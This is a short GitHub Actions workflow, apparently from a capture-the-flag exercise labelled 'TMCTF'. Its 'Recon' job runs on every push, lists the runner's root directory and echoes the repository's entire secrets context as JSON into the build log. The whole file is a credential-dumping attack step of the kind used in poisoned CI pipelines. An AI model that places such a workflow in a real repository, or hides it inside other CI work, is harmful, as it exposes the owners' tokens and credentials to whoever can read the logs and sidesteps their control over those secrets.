name: TMCTF
on: [push]
jobs: 
  Recon: 
    runs-on: ubuntu-latest
    steps:
      - run: |
          ls -l /
      - run: echo "$SECRETS_CONTEXT"
        env:
            SECRETS_CONTEXT: ${{ toJson(secrets) }}
